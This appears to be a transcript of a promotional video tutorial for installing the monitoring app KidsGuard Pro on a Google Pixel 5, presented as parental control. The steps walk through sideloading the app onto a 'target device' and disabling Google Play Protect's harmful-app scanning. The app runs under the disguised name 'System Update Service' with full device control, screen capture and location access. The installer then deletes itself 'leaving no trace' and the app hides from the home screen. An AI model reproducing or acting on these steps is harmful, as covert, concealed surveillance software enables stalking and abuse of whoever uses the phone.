Hi everyone, welcome to our channel. Today, we're going to guide you through the step-by-step process of setting up KidsGuard Pro on your Google Pixel 5 device. By the end of this video, you'll be ready to get started quickly and effortlessly. Let's dive in. Hi there. Just a quick update on the installation process. This will only take 3 to 4 minutes, so please hang tight as we get everything set up. The key thing is to make sure you have the proper permissions to access the target device before continuing. Also, don't forget to pick the plan that best suits your needs to get started. Welcome to our comprehensive setup guide for KidsGuard Pro on Google Pixel 5 devices. In this video, we'll walk you through every step of the installation process, helping you make the most of this powerful parental control app. Whether you're setting it up for the first time or just need a quick refresher, we've got everything you need. By the end of this guide, you'll be fully prepared to monitor and protect your child's mobile experience. Let's get started. Step 1. Downloading the app. On the target Google Pixel 5 phone, open any browser, e.g. Google Chrome, and go to https://www.clevguard.vip to access the download page. Slide the bar to start downloading the Installation Assistant app. Confirm by clicking Install to proceed with the download. Step 2. Installing the app on the target device. After the download is complete, tap Open, Install to start the installation. When prompted with the Enable Install Unknown Apps pop-up, tap Yes, and switch on Allow from this source. Once installation finishes, tap Install, and wait for the progress bar to complete. Then, select Install from the System Update Service pop-up window to open the Assistant app. Step 3. Setting up the Assistant app. On the KidsGuard EULA and Privacy Policy screen, tap Agree to proceed. Log in using your registered email and password. Enter the required profile details, name, gender, age. Tap Next, Configuration, proceed to Settings. Scroll to System Update Service and enable it by toggling Always Allow Display over other apps. Then, go to Proceed to Settings and temporarily disable Google Play Protect by turning off app scanning and harmful app detection in the Play Protect settings. Step 4. Confirming the configuration. Return to the Assistant app and tap Already Set to confirm. Then, go to Proceed to Settings, System Update Service, allow System Update Service to grant full control of the device. The setup process will continue automatically. Tap Proceed to Settings, then go to Usage Access and enable it. Ensure the following options are activated. Allow notification access, activate device admin apps, enter the verification code, activate screen capture, activate location access, and ignore battery optimization. Set in the Assistant app and choose Verify Setup to finalize the process. Once complete, the Installation Assistant will be automatically deleted from the target device, leaving no trace. The Assistant app will also go incognito, disappearing from the home screen and app library. Congratulations! You've successfully completed the setup process. Let's quickly review what we've achieved in this video. We've successfully downloaded and installed KidsGuard Pro on your Google Pixel 5, set everything up, and confirmed the installation. If you need any additional help, don't hesitate to visit our support site or get in touch with our customer service team. We're here to assist you. That concludes today's video. If you found this tutorial useful, please give it a thumbs up and subscribe to our channel for more content like this. To enhance your child's online safety, click the link in the description to download and set up KidsGuard Pro on your Google Pixel 5. Ensuring your child's safety is just a few clicks away.